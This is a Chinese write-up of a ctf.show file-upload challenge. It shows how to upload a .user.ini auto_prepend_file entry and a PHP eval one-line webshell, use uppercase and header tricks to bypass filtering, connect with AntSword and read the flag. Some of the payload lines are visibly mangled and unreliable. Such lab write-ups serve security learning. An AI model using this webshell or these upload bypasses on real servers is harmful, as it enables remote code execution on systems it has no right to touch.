ctf show web入门154

这道题考查的还是文件上传漏洞,但是本题提示后端不能单二校验,说明本题的后端检验更加严格

我们前面的操作跟上一题一样,先上传一个.user.ini文件文件内容是:auto_prepend_file=一句话木马文件名

将文件名改为.user.ini.png是为了绕过前端验证用bp抓包后需要把文件名改回为.user.ini防止因修改后缀名导致错误

上传成功后将包含一句话木马的文件也上传到该网站

此时发现上传失败

考虑到提示说后端不能单二校验所以该题肯定还有其他限制条件,我们考虑是否为
<?php @eval(_POST\['attack'\]);?\>的文件头没有图片文件的特点,所以我们尝试在 \_POST'attack');?>前加上Gif89a

所以不是文件头检验,还有可能是检验Content-Type: image/png但是前端允许.png文件上传所以这里不考虑

,那就可能是文件内容检验我们尝试修改一句话木马将: <?php @eval(_POST\['attack'\]);?\>改为 \_POST'attack');?>使用大写来绕过限制

发现上传成功现在我们可以尝试使用蚁剑连接

url地址为http://e88615b4-0b6c-4c55-8944-635c13ab6c4e.challenge.ctf.show/upload/

发现成功连接上蚁剑,接下来就是查看当前网站下的目录

最后在文件路径为/var/www/html/flag.php下找到了flag

相关推荐
海绵宝宝转agent1 小时前
2026-10-9 leetcode100刷题+面经整理
笔记·算法·面试
yi0112 小时前
DAY24: LeetCode 167:两数之和 II|从暴力枚举到左右双指针
笔记·python·算法·leetcode·二分查找·双指针
yi0112 小时前
LeetCode 15:三数之和|排序 + 双指针,如何避免重复答案?
笔记·python·算法·leetcode·双指针
北风toto2 小时前
数据库笔记:Armstrong 公理系统与集合论的深度辨析
数据库·笔记
EasyBr指纹浏览器2 小时前
我的开源项目:小红书笔记归档,把来源和缺项一起留下
笔记·小红书·开源工具·素材管理·内容归档
海海不掉头发2 小时前
图论及其应用_课堂笔记整理_CSDN博客
笔记·图论
志尊宝2 小时前
Vue3 零基础每日笔记(075):图片懒加载与骨架屏
javascript·vue.js·笔记
会博通·代码搬运工3 小时前
家装数字化交付笔记:图纸归档、工地采集与档案系统对接的工程实践
笔记·数字化转型·档案管理系统·业务档案系统·家装数字化
Code_Solitude3 小时前
高数第一章函数笔记(原稿手写+AI识别优化)
人工智能·笔记
imDwAaY4 小时前
MCP 到底是什么?大模型如何连接外部工具与数据?
笔记